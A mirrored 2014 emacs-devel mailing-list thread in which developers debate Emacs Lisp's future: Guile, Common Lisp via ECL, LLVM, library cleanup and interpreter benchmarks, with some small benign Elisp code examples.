unofficial mirror of emacs-devel@gnu.org 
* Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-11 16:29 Guile emacs thread (again) Christopher Allan Webber
@ 2014-09-16 15:50 ` Stefan Monnier
  2014-09-16 16:03   ` Lennart Borgman
                     ` (2 more replies)
  0 siblings, 3 replies; 261+ messages in thread
From: Stefan Monnier @ 2014-09-16 15:50 UTC (permalink / raw)
  To: Christopher Allan Webber; +Cc: emacs-devel

> So this email is partly a:
>  - What now?  What's the chance of work towards guilemacs moving over to
>    an official emacs git branch, and that port happening, anytime soon?
>  - Is anyone running it?  How's it going for you?

Good questions.  I've had the opportunity to think a bit more about
Emacs Lisp and its possible evolution and I'm still not sure what to
think about it.

I see a few different options for Emacs Lisp.

First, of course we can keep on evolving Elisp on its own.  This has
worked OK for the last 30 years, so it's not such a terrible choice.
The main problems I see with that:
- Elisp is slow and as CPUs aren't getting faster, its slowness makes itself
  noticed more often.
- Lack of some features, most notably FFI and concurrency.
- Lack of manpower.

This last point is for me the strongest motivation to try and move to
some other system, where we could use other people's work.

One such option is Guile-Emacs.  This presumably would give us a faster
implementation (at least in theory, their bytecode is significantly
more efficient), would give us an FFI, and would give us more manpower
since we'd be benefiting from the work done on Guile.

Note that while Guile does come with support for threading, it doesn't
immediately let us use concurrency in Guile-Emacs, because of all the
issues of synchronizing access to shared data, with all the existing
Emacs code (both C and Elisp) assuming that this problem doesn't exist.
IOW, language support for concurrency is just a first step on the way to
letting Emacs Lisp use concurrency.

Another detail that needs to be spelled out is the difference between
the language and its implementation.  Guile-Emacs provides 2 languages:
Emacs Lisp and Scheme (well, it also provides a few more, but that's
not important).  Many people are thinking "cool, so I'll be able to
write extensions in Scheme", but I'm not sure defining Emacs as "this
editor that comes with N extension languages" is a good idea.

One of the main reasons for Emacs's enduring success is its large set of
third party packages so obviously we can't drop support for Elisp any
time soon.  And as much as I like Scheme, I'm very much unconvinced that
it's really so much better that it's worth converting packages from
Elisp to Scheme.

So if we go for Guile-Emacs, we'll be stuck with Guile, i.e. we'd
have (old and new) packages that use Elisp, new packages that use
Scheme, maybe yet other new packages that use, say, Javascript (or some
other language supported by Guile).  That would make the work of Emacs
(and GNU ELPA) maintenance harder.

And of course, if Guile's own manpower dries up, Emacs would be forced
to keep supporting Guile, which is more work than supporting just Elisp.

So, I think that ideally, we'd want to stick to Elisp, or some
evolution thereof.  Sadly, I don't see how to evolve Elisp into Scheme:
they are closely related languages, but the differences are large enough
that it seems hard to reconcile them.

The only standard language into which Elisp can evolve, AFAICT, is
Common Lisp.  [ Now some readers get disappointed, while some others
become excited.  ]  There are some incompatibilities between the two
languages, but I can imagine working them out over the years, or even
living with them without too much trouble, such that we could use
Common-Lisp libraries in Emacs.

Of course, that's for the language side, but on the implementation side,
I don't really know what Common-Lisp implementation we could re-use
(both GNU implementations are dormant, so there's no manpower for us to
tap into).  Still: there are many Common-Lisp implementations out there,
so there's probably one that could work for us.


        Stefan




* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier
@ 2014-09-16 16:03   ` Lennart Borgman
  2014-09-17 18:24     ` Jorgen Schaefer
  2014-09-18  8:43     ` Emilio Lopes
  2014-09-16 16:09   ` Eli Zaretskii
  2014-09-16 16:54   ` Lars Brinkhoff
  2 siblings, 2 replies; 261+ messages in thread
From: Lennart Borgman @ 2014-09-16 16:03 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: Christopher Allan Webber, Emacs-Devel devel


On Tue, Sep 16, 2014 at 5:50 PM, Stefan Monnier <monnier@iro.umontreal.ca>
wrote:

> The main problems I see with that:
> - Elisp is slow and as CPUs aren't getting faster, its slowness makes
> itself
>   noticed more often.
> - Lack of some features, most notably FFI and concurrency.
> - Lack of manpower.
>

Perhaps also the lack of possibility to enhance Emacs with code written in
other languages? I think for example that Javascript will be something most
future programmers will know. Could Guile make it easier to enhance Emacs
with Javascript (as an alternative to Elisp)?



* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier
  2014-09-16 16:03   ` Lennart Borgman
@ 2014-09-16 16:09   ` Eli Zaretskii
  2014-09-16 16:54   ` Lars Brinkhoff
  2 siblings, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-09-16 16:09 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: cwebber, emacs-devel

> From: Stefan Monnier <monnier@iro.umontreal.ca>
> Date: Tue, 16 Sep 2014 11:50:54 -0400
> Cc: emacs-devel@gnu.org
> 
> One such option is Guile-Emacs.  This presumably would give us a faster
> implementation (at least in theory, their bytecode is significantly
> more efficient)

If by "bytecode" you mean the *.go files, then we should also keep in
mind that these are not architecture-independent as *.elc files are.
Not a catastrophe, of course, but something to remember.

> And of course, if Guile's own manpower dries up, Emacs would be forced
> to keep supporting Guile, which is more work than supporting just Elisp.

A data point: judging by "git log", Guile is currently developed and
maintained by about 3 active developers.




* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier
  2014-09-16 16:03   ` Lennart Borgman
  2014-09-16 16:09   ` Eli Zaretskii
@ 2014-09-16 16:54   ` Lars Brinkhoff
  2 siblings, 0 replies; 261+ messages in thread
From: Lars Brinkhoff @ 2014-09-16 16:54 UTC (permalink / raw)
  To: emacs-devel

Stefan Monnier <monnier@iro.umontreal.ca> writes:
> The only standard language into which Elisp can evolve, AFAICT, is
> Common Lisp.  [ Now some readers get disappointed, while some others
> become excited.  ]

Excited.

> [...] we could use Common-Lisp libraries in Emacs.

That's almost possible already, because there is a Common Lisp
implementation (say 90% complete) for Emacs, including a compiler from
CL to Elisp.





* Re: Emacs Lisp's future (was: Guile emacs thread (again))
@ 2014-09-17  2:57 Lally Singh
  2014-09-17 11:01 ` Tom
  2014-09-17 11:43 ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Lally Singh @ 2014-09-17  2:57 UTC (permalink / raw)
  To: emacs-devel


So if this is a runtime system issue, what about elisp on LLVM?  Let the LLVM
project handle the backend and performance issues, and emacs can maintain
one language frontend.  There are plenty of people working on that, so
emacs can ride that for almost free.

I'm assuming that there are reasons why it doesn't work, as someone
(apparently) did the work some time ago:
https://github.com/boostpro/emacs-llvm-jit  Perhaps it just needs a little
TLC?



* Re: Emacs Lisp's future (was: Guile emacs thread (again))
@ 2014-09-17  7:38 Kristian Nygaard Jensen
  2014-09-17 15:15 ` Emacs Lisp's future Stefan Monnier
  2014-09-26 13:43 ` Robin Templeton
  0 siblings, 2 replies; 261+ messages in thread
From: Kristian Nygaard Jensen @ 2014-09-17  7:38 UTC (permalink / raw)
  To: emacs devel

 > Of course, that's for the language side, but on the implementation side,
 > I don't really know what Common-Lisp implementation we could re-use
 > (both GNU implementations are dormant, so there's no manpower for us
 > tap into).  Still: there are many Common-Lisp implementations out there,
 > so there's probably one that could work for us.

Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems
alive; it is LGPL, so there would be no license issue.

-- 

Kristian Nygaard Jensen





* Emacs Lisp's future (was: Guile emacs thread (again))
@ 2014-09-17  8:22 Nic Ferrier
  0 siblings, 0 replies; 261+ messages in thread
From: Nic Ferrier @ 2014-09-17  8:22 UTC (permalink / raw)
  To: emacs-devel

Stefan Monnier wrote:

> First, of course we can keep on evolving Elisp on its own.  This has
> worked OK for the last 30 years, so it's not such a terrible choice.
> The main problems I see with that:
> - Elisp is slow and as CPUs aren't getting faster, its slowness makes itself
>   noticed more often.
> - Lack of some features, most notably FFI and concurrency.
> - Lack of manpower.
>
> This last point is for me the strongest motivation to try and move to
> some other system, where we could use other people's work.

I don't see that this is going to happen though. Emacs is an unusual
system. Moving the extension language to another community is just going
to cause more arguing along the lines of "this is how X lang does it" vs
"but we're Emacs and don't want to do it like that".

My view is we should improve the contribution process to get more
manpower for elisp. We have been doing that as a community. As a
reminder we have:

- adopted packaging allowing many more people to contribute pure elisp
- accepted a move to the most commonly used support tools (git, etc...)
- started to talk about changing the documentation format to a more
  common format

I see a new spirit of openness and willingness to change in the Emacs
community and it's really great.

I would implore you, my fellow emacs hackers, not to make too hasty a
decision on platform. Guile-Emacs may be cool, but if we can increase
developer diversity in Emacs through git and so on (I for one will be
contributing to the core thanks to this) then we may get all the
advantages of the Guile VM without having to go to Guile.

I'm sure there is more that we could do to get more man and woman
power. I hope that we consider those things as well as techy projects
like switching to Guile's VM.


Nic




* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-17  2:57 Lally Singh
@ 2014-09-17 11:01 ` Tom
  2014-09-17 11:43 ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Tom @ 2014-09-17 11:01 UTC (permalink / raw)
  To: emacs-devel

Lally Singh <lally.singh <at> gmail.com> writes:

> 
> So if this is a runtime system issue, what about elisp on LLVM?  Let the
> LLVM project handle the backend and performance issues, and emacs can
> maintain one language frontend.  There are plenty of people working on
> that, so emacs can ride that for almost free.

In the long run this would be the most practical solution: choose
a well supported and widely used VM which gets tons of developer
attention, so that VM development is taken care of, and implement
Elisp as a frontend.

This approach has the advantage of supporting the existing Elisp code
base and it would also make it possible to use other languages to extend
emacs, because widely used VMs have frontend implementations for
many modern languages (Python, etc.)






* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-17  2:57 Lally Singh
  2014-09-17 11:01 ` Tom
@ 2014-09-17 11:43 ` Richard Stallman
  2014-09-17 14:21   ` Lally Singh
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-09-17 11:43 UTC (permalink / raw)
  To: Lally Singh; +Cc: emacs-devel

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

It is not acceptable to base a GNU package on LLVM.  It is a
non-copylefted competitor to an important GNU package.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-17 11:43 ` Richard Stallman
@ 2014-09-17 14:21   ` Lally Singh
  0 siblings, 0 replies; 261+ messages in thread
From: Lally Singh @ 2014-09-17 14:21 UTC (permalink / raw)
  To: rms; +Cc: emacs-devel


Would DotGNU work?  Ignore C# and put in an elisp frontend.  The benefit
is that we can watch what the larger efforts are doing on those fronts,
and pick and choose the good ideas with little effort on our side.

DotGNU would get a boost of support from emacs, and it's a familiar enough
environment that a lot of programmers would be willing to go in and hack on
it.  They'd often already have transferable experience on the proprietary
counterparts of DotGNU, but would be able to vent their innate need to hack
on DotGNU instead of the more proprietary versions.  Emacs has a huge user
footprint, and leveraging it to boost another project would help,
especially a project that rides rather close to a very popular proprietary
platform - that's a lot of hackers to harness.

On Wed, Sep 17, 2014 at 7:43 AM, Richard Stallman <rms@gnu.org> wrote:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
> It is not acceptable to base a GNU package on LLVM.  It is a
> non-copylefted competitor to an important GNU package.
>
> --
> Dr Richard Stallman
> President, Free Software Foundation
> 51 Franklin St
> Boston MA 02110
> USA
> www.fsf.org  www.gnu.org
> Skype: No way! That's nonfree (freedom-denying) software.
>   Use Ekiga or an ordinary phone call.
>
>



* Re: Emacs Lisp's future
  2014-09-17  7:38 Emacs Lisp's future (was: Guile emacs thread (again)) Kristian Nygaard Jensen
@ 2014-09-17 15:15 ` Stefan Monnier
  2014-09-17 16:15   ` James Cloos
  2014-09-26 13:43 ` Robin Templeton
  1 sibling, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-17 15:15 UTC (permalink / raw)
  To: Kristian Nygaard Jensen; +Cc: emacs devel

> Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems alive,
> it is lgpl, so there would be no license issue

Indeed, it looks like it might be a good candidate.


        Stefan




* Re: Emacs Lisp's future
  2014-09-17 15:15 ` Emacs Lisp's future Stefan Monnier
@ 2014-09-17 16:15   ` James Cloos
  2014-09-17 17:53     ` Stefan Monnier
  0 siblings, 1 reply; 261+ messages in thread
From: James Cloos @ 2014-09-17 16:15 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: Kristian Nygaard Jensen, emacs devel

>>>>> "SM" == Stefan Monnier <monnier@iro.umontreal.ca> writes:

>> Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems alive,
>> it is lgpl, so there would be no license issue

SM> Indeed, it looks like it might be a good candidate.

It is the lisp which sage supports (they have a funding grant which
requires that sage be installable from source on just about anything
which has an existing C compiler) and the maxima tests consistently
show it as second only to compiled-to-machine-code lisps like sbcl.

As such, it looks like it will continue to have excellent development
and support for the foreseeable future.

-JimC
-- 
James Cloos <cloos@jhcloos.com>         OpenPGP: 0x997A9F17ED7DAEA6






* Re: Emacs Lisp's future
  2014-09-17 16:15   ` James Cloos
@ 2014-09-17 17:53     ` Stefan Monnier
  2014-09-17 21:46       ` Stefan Monnier
                         ` (2 more replies)
  0 siblings, 3 replies; 261+ messages in thread
From: Stefan Monnier @ 2014-09-17 17:53 UTC (permalink / raw)
  To: James Cloos; +Cc: Kristian Nygaard Jensen, emacs devel

> It is the lisp which sage supports (they have a funding grant which
> requires that sage be installable from source on just about anything
> which has an existing C compiler) and the maxima tests consistently
> show it as second only to compiled-to-machine-code lisps like sbcl.
> As such, it looks like it will continue to have excellent development
> and support for the foreseeable future.

Sounds good.  If someone wants to look deeper into what it would take to
use ECL in Emacs, that would be very welcome.

There are lots of potential issues in such a project.
A start would be to check:
- does it use its own event loop?
- can it handle conservative stack scanning?
- what other conventions are needed for C code to cooperate with the GC?
- could we do something akin to our "dump"?

Of course, another issue with Common-Lisp integration is that we'd want
to figure out how to integrate the two languages.  So, we'd need to
investigate what are the current incompatibilities.


        Stefan




* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-16 16:03   ` Lennart Borgman
@ 2014-09-17 18:24     ` Jorgen Schaefer
  2014-09-17 19:25       ` Lally Singh
  2014-09-18  2:07       ` Alexis
  2014-09-18  8:43     ` Emilio Lopes
  1 sibling, 2 replies; 261+ messages in thread
From: Jorgen Schaefer @ 2014-09-17 18:24 UTC (permalink / raw)
  To: emacs-devel

On Tue, 16 Sep 2014 18:03:17 +0200
Lennart Borgman <lennart.borgman@gmail.com> wrote:

> On Tue, Sep 16, 2014 at 5:50 PM, Stefan Monnier
> <monnier@iro.umontreal.ca> wrote:
> 
> > The main problems I see with that:
> > - Elisp is slow and as CPUs aren't getting faster, its slowness
> > makes itself
> >   noticed more often.
> > - Lack of some features, most notably FFI and concurrency.
> > - Lack of manpower.
> >
> 
> Perhaps also the lack of possibility to enhance Emacs with code
> written in other languages? I think for example that Javascript will
> be something most future programmers will know. Could Guile make it
> easier to enhance Emacs with Javascript (as an alternative to Elisp)?

I think the (often-cited, not just here) idea of supporting multiple
languages is a red herring, mostly. Every extension language supported
adds some burden on those who want to understand what their editor
does, not just use pre-packaged code. One of the great things about
Emacs is that, once I know ELisp, I have a good chance of understanding
and modifying any extension I see. And learning Emacs Lisp is not
exactly hard.

But we do not have to be all theoretical here. There is an editor which
supports a dozen extension languages. The paradoxical thing to notice
when you look at vim plugins is that most of them are written in VimL,
including rather complex ones like NERD-tree and fugitive. I'd argue
that VimL is a tiny bit harder to learn and use than ELisp. There are
various reasons for why most plugins are written in it, but I do think
that this is a pretty good indicator that the lack of "common" languages
for extension is not exactly high on the list of problems for an editor.

There are plenty of things in ELisp itself that I'd put much higher on
that list.

- Lack of a common structured datatype. While there's cl-defstruct, the
  support is a bit limited (C-h f does not work well with it), and a
  lot of code simply does not use it, making it seem a bit like a
  red-haired stepchild instead of a core recommended language feature.
  Alists and plists are usually used where modern languages would use
  structured datatypes, or even some hack with cons cells or lists and
  indexed access.
- Hashes are one of those data types that are used all over the place
  in other languages, but you see them rarely in Emacs Lisp, again often
  losing out to alists and plists. This might be related to the
  standard library functions being a bit baroque. (There's some
  third-party hash library somewhere.)
- Speaking of third-party libraries, s.el, dash.el and f.el provide
  things that really ought to be in core Emacs.
- The regex engine is annoying to use. Providing some interface to PCRE
  would be a great step forward, and does not even have to be
  backwards-incompatible.
- There are tons of warts in Emacs Lisp. nth vs. elt for example,
  with their exciting incompatible calling conventions.
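
To make the points in the list above concrete, here is a minimal sketch
of the same two-field record held as a struct, an alist, a plist and a
hash table, followed by the nth/elt argument order.  The names
my-point and my-point-* are made up for illustration; only cl-defstruct,
assq, plist-get, the hash-table functions, nth and elt are standard.

```elisp
(require 'cl-lib)

;; Hypothetical record type, for illustration only.
(cl-defstruct my-point x y)

(defvar my-point-struct (make-my-point :x 1 :y 2))
(defvar my-point-alist  '((x . 1) (y . 2)))
(defvar my-point-plist  '(:x 1 :y 2))
(defvar my-point-hash
  (let ((h (make-hash-table :test 'eq)))
    (puthash 'x 1 h)
    (puthash 'y 2 h)
    h))

;; Four different accessors for the same piece of data.
(my-point-y my-point-struct)        ; struct accessor
(cdr (assq 'y my-point-alist))      ; alist lookup
(plist-get my-point-plist :y)       ; plist lookup
(gethash 'y my-point-hash)          ; hash-table lookup

;; nth takes the index first; elt takes the sequence first.
(nth 1 '(a b c))
(elt '(a b c) 1)
```

Each of the four lookups reads the same field, which is roughly why
code that mixes these representations is harder to follow than code
built on one structured type.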

One thing I think would benefit Emacs Lisp as a language a lot would be
a standard library cleanup. An effort to go through the libraries that
come with Emacs, separate them into "standard library" and "extensions
that come with Emacs", and then go through the "standard library",
provide sane names when necessary (like setcar is provided for rplaca)
and deprecating the old ones, or simply deprecate all but one version of
functions with overlapping use (nth or elt, pick one). Finally, add
standard libraries for common functionality that is currently lacking
(see above).
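
As a rough sketch of what "provide a sane name and deprecate the old
one" could look like with what Emacs already ships, one option is
define-obsolete-function-alias.  The function names my-list-ref and
my-old-ref and the version string "24.5" are hypothetical, chosen only
for this example.

```elisp
;; Hypothetical names: `my-list-ref' is the new preferred name,
;; `my-old-ref' is the legacy name kept for compatibility.
(defun my-list-ref (list index)
  "Return element INDEX of LIST (sequence first, like `elt')."
  (nth index list))

;; The old name keeps working, but the byte compiler warns when
;; it is used.  The version string is an assumption.
(define-obsolete-function-alias 'my-old-ref 'my-list-ref "24.5")

;; Existing callers are unaffected at run time.
(my-old-ref '(a b c) 2)
```

This keeps old packages running while steering new code to a single
name, at the cost of carrying both symbols for some releases.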

The next step would be going through the "extensions that come with
Emacs" and make sure they all use namespace prefixes for anything but
very specific commands meant for users to use with M-x. Only standard
library functions are allowed to be namespace-free.

These things would make Emacs Lisp a lot easier to use and also easier
to learn for new users.

This is all doable, but it needs manpower (#3 on Stefan's list). Which
is manpower that would not be doing other cool stuff on Emacs.

Regards,
Jorgen




* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-17 18:24     ` Jorgen Schaefer
@ 2014-09-17 19:25       ` Lally Singh
  2014-09-18  2:07       ` Alexis
  1 sibling, 0 replies; 261+ messages in thread
From: Lally Singh @ 2014-09-17 19:25 UTC (permalink / raw)
  To: Jorgen Schaefer; +Cc: emacs-devel


On Wed, Sep 17, 2014 at 2:24 PM, Jorgen Schaefer <forcer@forcix.cx> wrote:

> On Tue, 16 Sep 2014 18:03:17 +0200
> Lennart Borgman <lennart.borgman@gmail.com> wrote:
> > Perhaps also the lack of possibility to enhance Emacs with code
> > written in other languages? I think for example that Javascript will
> > be something most future programmers will know. Could Guile make it
> > easier to enhance Emacs with Javascript (as an alternative to Elisp)?
>
> I think the (often-cited, not just here) idea of supporting multiple
> languages is a red herring, mostly. Every extension language supported
> adds some burden on those who want to understand what their editor
> does, not just use pre-packaged code. One of the great things about
> Emacs is that, once I know ELisp, I have a good chance of understanding
> and modifying any extension I see. And learning Emacs Lisp is not
> exactly hard.
>

I think a policy of "if written for emacs, do it in elisp" is a good one,
but let's acknowledge the advantage of easy linking/calling into other code
bases that may come with having a multi-language-compatible runtime system.
I'm sure we've all seen some systems that we'd love to invoke directly
from elisp.


[snipping some very good points]

> One thing I think would benefit Emacs Lisp as a language a lot would be
> a standard library cleanup. An effort to go through the libraries that
> come with Emacs, separate them into "standard library" and "extensions
> that come with Emacs", and then go through the "standard library",
> provide sane names when necessary (like setcar is provided for rplaca)
> and deprecating the old ones, or simply deprecate all but one version of
> functions with overlapping use (nth or elt, pick one). Finally, add
> standard libraries for common functionality that is currently lacking
> (see above).
>

I completely agree that there's plenty of work needed there, but:
 - If staying with elisp, this is a separate discussion
 - If not staying with elisp, these problems can be addressed during
conversion.



* Re: Emacs Lisp's future
  2014-09-17 17:53     ` Stefan Monnier
@ 2014-09-17 21:46       ` Stefan Monnier
  2014-09-18  1:09         ` James Cloos
                           ` (2 more replies)
  2014-09-18 18:59       ` Johan Bockgård
  2014-09-18 21:01       ` Sam Steingold
  2 siblings, 3 replies; 261+ messages in thread
From: Stefan Monnier @ 2014-09-17 21:46 UTC (permalink / raw)
  To: James Cloos; +Cc: Kristian Nygaard Jensen, emacs devel

>> It is the lisp which sage supports (they have a funding grant which
>> requires that sage be installable from source on just about anything
>> which has an existing C compiler) and the maxima tests consistently
>> show it as second only to compiled-to-machine-code lisps like sbcl.

Note that this speed is probably only for "compiled code".
ECL has two evaluation methods:
- "byte-code interpreter".
- "compilation to native code via C" (requires a local installation of
  a C compiler).

I just tried a silly microbenchmark to get an idea of the byte-code
interpreter's performance:

   (let ((x 0)) (dotimes (i 10000000) (setq x (- i x))) x)

and on my machine, it took 3.5s.  This isn't super-fast
compared to Emacs-24.3 which takes 6.7s in the purely interpreted case
and 1.7s in the byte-compiled case.

Of course, this is a silly benchmark, but I think this indicates that
ECL focuses on performance of compiled code (the above silly code runs
in 0.7s when compiled, FWIW).
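
For anyone wanting to repeat the Emacs side of this comparison, a
minimal sketch follows.  It assumes the form is evaluated (not loaded
from a compiled file), so that the first timing is the interpreted
case.  The helper name my-silly-loop and its argument N are made up
for this example; benchmark-run and byte-compile are standard.

```elisp
(require 'benchmark)

;; Hypothetical helper wrapping the loop from the message above.
(defun my-silly-loop (n)
  "Run the microbenchmark loop N times and return the final value."
  (let ((x 0))
    (dotimes (i n)
      (setq x (- i x)))
    x))

;; Interpreted case: returns (ELAPSED-SECONDS GC-COUNT GC-SECONDS).
(benchmark-run 1 (my-silly-loop 10000000))

;; Byte-compile the same function in place and time it again.
(byte-compile 'my-silly-loop)
(benchmark-run 1 (my-silly-loop 10000000))
```

The numbers depend on the machine and Emacs version, so they are only
meaningful relative to each other.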


        Stefan






* Re: Emacs Lisp's future
  2014-09-17 21:46       ` Stefan Monnier
@ 2014-09-18  1:09         ` James Cloos
  2014-09-18  7:12         ` Helmut Eller
  2014-09-18  7:46         ` Thorsten Jolitz
  2 siblings, 0 replies; 261+ messages in thread
From: James Cloos @ 2014-09-18  1:09 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: Kristian Nygaard Jensen, emacs devel

>>>>> "SM" == Stefan Monnier <monnier@iro.umontreal.ca> writes:

SM> Note that this speed is probably only for "compiled code".

I hadn't realized that ecls compiled the lisp, and as you suspected
maxima's install routine does compile itself when using ecls, just as
it does when using sbcl.

But it would be cool to have elisp compiled to fasl files.  The main
code could be compiled and linked as a library, rather than dumped.

-JimC
-- 
James Cloos <cloos@jhcloos.com>         OpenPGP: 0x997A9F17ED7DAEA6




* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-17 18:24     ` Jorgen Schaefer
  2014-09-17 19:25       ` Lally Singh
@ 2014-09-18  2:07       ` Alexis
  1 sibling, 0 replies; 261+ messages in thread
From: Alexis @ 2014-09-18  2:07 UTC (permalink / raw)
  To: emacs-devel


Jorgen Schaefer writes:

> I think the (often-cited, not just here) idea of supporting multiple
> languages is a red herring, mostly. Every extension language supported
> adds some burden on those who want to understand what their editor
> does, not just use pre-packaged code. One of the great things about
> Emacs is that, once I know ELisp, I have a good chance of
> understanding and modifying any extension I see.

+1. It seems to me that much discussion around this issue focuses on
being able to use one's favourite language to extend Emacs, without
considering what it might be like to:

* start using an extension that seems like it might significantly assist
  one's productivity;
* find a show-stopping bug in it; and
* discover that the extension is written in a programming language one
  loves to loathe.

Also, to an (admittedly very limited) extent, it's /already/ possible to
use a number of languages other than ELisp in Emacs, for at least some
things, via org-babel:

http://orgmode.org/manual/Evaluating-code-blocks.html#Evaluating-code-blocks

A list of languages currently supported by org-babel can be found at:

http://orgmode.org/manual/Languages.html#Languages
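
As a rough idea of what driving org-babel from Elisp might look like,
here is a sketch that evaluates one source block in a temporary Org
buffer.  The helper my-babel-eval is hypothetical; it assumes Org is
installed and that the requested language is enabled in
org-babel-load-languages (emacs-lisp is enabled by default).

```elisp
(require 'org)

;; Hypothetical helper: evaluate one source block and return its value.
(defun my-babel-eval (lang body)
  "Evaluate BODY as a LANG source block via org-babel; return the result."
  (let ((org-confirm-babel-evaluate nil))   ; skip the interactive prompt
    (with-temp-buffer
      (org-mode)
      (insert "#+BEGIN_SRC " lang "\n" body "\n#+END_SRC\n")
      (goto-char (point-min))               ; point must be on the block
      (org-babel-execute-src-block))))

(my-babel-eval "emacs-lisp" "(+ 1 2)")
```

For languages other than Elisp this goes through an external
interpreter, so it is closer to scripting a subprocess than to a real
second extension language.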

i would be interested to know what experiences people might have had in
using org-babel as part of an Emacs extension ....

> Speaking of third-party libraries, s.el, dash.el and f.el provide
> things that really ought to be in core Emacs.

Agreed. i've found it quite surprising that simple functions like
-flatten and s-repeat aren't available in ELisp by default.

> The regex engine is annoying to use. Providing some interface to PCRE
> would be a great step forward, and does not even have to be
> backwards-incompatible.

i like this suggestion. i'm rather comfortable with Perl5 REs, and can
find myself frustrated trying to create REs in ELisp. Having said that,
the issue is not usually the syntax of ELisp REs per se (e.g. needing to
escape things like capturing parentheses or the alternatives pipe); it's
needing to escape various things /further/ because REs can only be
specified in the form of a standard ELisp string. On several occasions
i've ended up using a combination of pcre-to-elisp and re-builder to try
to work out if the problem is too few backslashes, too many backslashes,
or both.
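
The backslash problem described above can be seen in a small example.
The Perl-style pattern (foo|bar)\.txt is written below once by hand as
an Elisp string and once with the built-in rx macro, which is a
different approach from pcre-to-elisp but avoids the manual escaping.
The variable names are made up for illustration.

```elisp
;; Perl-style pattern:  (foo|bar)\.txt
;; As an Elisp string, every regexp backslash must itself be doubled.
(defvar my-regexp-by-hand "\\(foo\\|bar\\)\\.txt")

;; The same pattern built with `rx', which generates the escaping.
(defvar my-regexp-by-rx
  (rx (group (or "foo" "bar")) ".txt"))

;; Both match "bar.txt" starting at index 1 and capture "bar".
(string-match my-regexp-by-hand "xbar.txt")
(match-string 1 "xbar.txt")

(string-match my-regexp-by-rx "xbar.txt")
(match-string 1 "xbar.txt")
```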


Alexis.




* Re: Emacs Lisp's future
  2014-09-17 21:46       ` Stefan Monnier
  2014-09-18  1:09         ` James Cloos
@ 2014-09-18  7:12         ` Helmut Eller
  2014-09-18  7:46         ` Thorsten Jolitz
  2 siblings, 0 replies; 261+ messages in thread
From: Helmut Eller @ 2014-09-18  7:12 UTC (permalink / raw)
  To: emacs-devel

On Wed, Sep 17 2014, Stefan Monnier wrote:

>>> It is the lisp which sage supports (they have a funding grant which
>>> requires that sage be installable from source on just about anything
>>> which has an existing C compiler) and the maxima tests consistently
>>> show it as second only to compiled-to-machine-code lisps like sbcl.
>
> Note that this speed is probably only for "compiled code".

The story that I've heard is that Maxima uses primarily GCL (not ECL,
though it would also work in ECL and other CLs) and that GCL is fast in
that case because Maxima uses old-fashioned idioms a lot, like EVAL all
over the place.

The last thing I've heard of ECL is that it's searching for a new maintainer
because the current one can no longer use it at work (university context
where the Lisp using project has ended).  There's also a fork of ECL
called MKCL with supposedly better multithreading.

Just saying, because ECL is apparently also short on man power.

Helmut





* Re: Emacs Lisp's future
  2014-09-17 21:46       ` Stefan Monnier
  2014-09-18  1:09         ` James Cloos
  2014-09-18  7:12         ` Helmut Eller
@ 2014-09-18  7:46         ` Thorsten Jolitz
  2 siblings, 0 replies; 261+ messages in thread
From: Thorsten Jolitz @ 2014-09-18  7:46 UTC (permalink / raw)
  To: emacs-devel

Stefan Monnier <monnier@iro.umontreal.ca> writes:

> I just tried a silly microbenchmark to get an idea of the byte-code
> interpreter's performance:
>
>    (let ((x 0)) (dotimes (i 10000000) (setq x (- i x))) x)
>
> and on my machine, it took 3.5s compared.  This isn't super-fast
> compared to Emacs-24.3 which takes 6.7s in the purely interpreted case
> and 1.7s in the byte-compiled case.

I could not resist comparing this with my favorite 'pure and powerful'
(and interpreted) PicoLisp:

,----
| : (bench (let X 0 (for I 10000000 (setq X (- I X))) X))
| 0.338 sec
| -> 5000000
`----

while the Emacs Lisp version on my machine yields:

,----
| : (benchmark-run nil (let ((x 0)) (dotimes (i 10000000) (setq x (- i x))) x))
`----

-> (3.5045056839999997 0 0.0)

See 

,----
| http://picolisp.com/wiki/?PILvsEL 
`----

for more speed comparisons between PicoLisp and Emacs Lisp.

-- 
cheers,
Thorsten





* Re: Emacs Lisp's future (was: Guile emacs thread (again))
  2014-09-16 16:03   ` Lennart Borgman
  2014-09-17 18:24     ` Jorgen Schaefer
@ 2014-09-18  8:43     ` Emilio Lopes
  1 sibling, 0 replies; 261+ messages in thread
From: Emilio Lopes @ 2014-09-18  8:43 UTC (permalink / raw)
  To: Emacs-Devel devel

2014-09-16 18:03 GMT+02:00 Lennart Borgman <lennart.borgman@gmail.com>:
> Perhaps also the lack of possibility to enhance Emacs with code written in
